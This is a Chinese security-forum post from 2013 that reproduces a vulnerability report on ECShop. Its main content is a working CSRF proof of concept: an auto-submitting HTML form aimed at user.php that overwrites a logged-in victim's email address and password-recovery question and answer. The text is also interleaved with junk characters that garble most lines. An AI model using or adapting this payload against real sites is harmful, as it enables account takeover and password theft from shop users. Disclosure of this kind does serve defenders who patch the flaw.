中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
- S; r  e- l$ K4 t( }! vecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现- p4 {2 I' \* s3 a! ]7 j# i) J

. t+ }& P' |1 C* z9 ^5 a$ m4 \Demo For:http://www.wooyun.org/bug.php?action=view&id=3958 _+ y- O0 B& I- b8 Q

6 R! j) d* B5 v- G9 h8 S* \- }详细说明:
0 F5 [' v2 L- Y  t) _+ d$ h5 v利用csrf和xss可以突破官方所说的“障碍”
9 L( R: j* H. y3 _- bxss版本已经有人说明
' @0 s" L& a6 X; T这里给出csrf版本7 D% G' f6 Q; B6 a% S( I
8 r/ R' |- l8 o8 B& T- {
漏洞证明:
* D9 o3 r4 A6 Z% w0 T" t! F& K<html>
5 |( Z4 P& [& @. o+ y<body>
4 B( _  Y3 L. W& t<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
3 E% z: A, Y7 `+ x$ H1 S<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">; e: C% N. {9 K4 o  h8 y: w
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
$ W3 ?. c% N  l* ~/ ^<INPUT TYPE="text" NAME="sel_question" value="ecshop">
9 u" _2 M- }: `3 ~<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
* I& Y, X% t: o; @6 w</body>
5 s" |3 \+ @* }, c/ x3 r+ ?<script># j1 y* o- x: n8 j# L
document.forms[0].submit();2 w4 k- D% r* d# [1 S
</script>$ A7 y* Y+ w5 I6 O: T
</html>/ ~4 w; g5 x, L! W
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
3 a$ @1 k! V6 c6 h9 B3 C. K* Z9 |





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2